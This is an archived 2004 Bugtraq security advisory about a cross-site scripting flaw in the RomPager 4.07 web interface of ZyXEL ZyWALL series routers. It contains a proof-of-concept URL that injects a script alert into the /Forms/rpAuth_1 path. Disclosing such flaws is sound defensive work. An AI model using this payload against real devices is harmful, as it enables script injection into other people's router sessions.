ZyXEL10 OF ZyWALL Series Router Cross Site Scripting Vulnerabillity

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: ZyXEL10 OF ZyWALL Series Router Cross Site Scripting Vulnerabillity
From: "Rafel Ivgi" <theinsider@xxxxxxxxxx>
Date: Wed, 7 Jan 2004 01:01:24 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: "Rafel Ivgi" <theinsider@xxxxxxxxxx>

#######################################################################

Device:            ZyXEL10 OF ZyWALL Series Router
Software:         RomPager/4.07 UPnP/1.0
Vendor:           http://www.zyxel.com
Versions:        4.07
Platforms:       Windows
Bug:               Cross Site Scripting Vulnerabillity
Risk:              Low
Exploitation:    Remote with browser
Date:               6 Jan 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@xxxxxxxx
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============

ZyXEL10 is a high quality VPN router. the ZyWALL 10 offers a powerful
firewall capability,
including Stateful Packet Inspection and Anti Denial of Service (D.o.S).
Device Details:
http://www.zyxel.com/product/model.php?indexcate=1022044503&indexFlagvalue=1
021873683

#######################################################################

======
2) Bug
======

The Vulnerabillity is Cross Site Scripting type. If an attacker will request
the followingurl from the server
http://<host>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>alert('XSS')</sc
ript>
XSS appears and the server allows an attacker to inject & execute scripts.

#######################################################################

===========
3) The Code
===========

http://<host>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>alert('XSS')</sc
ript>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Prev by Date: RealNetworks fails to address Cross-Site Scripting in RealOne Player
Next by Date: [SECURITY] [DSA 414-1] New jabber packages fix denial of service
Previous by thread: RealNetworks fails to address Cross-Site Scripting in RealOne Player
Next by thread: [SECURITY] [DSA 414-1] New jabber packages fix denial of service
Index(es):
- Date
- Thread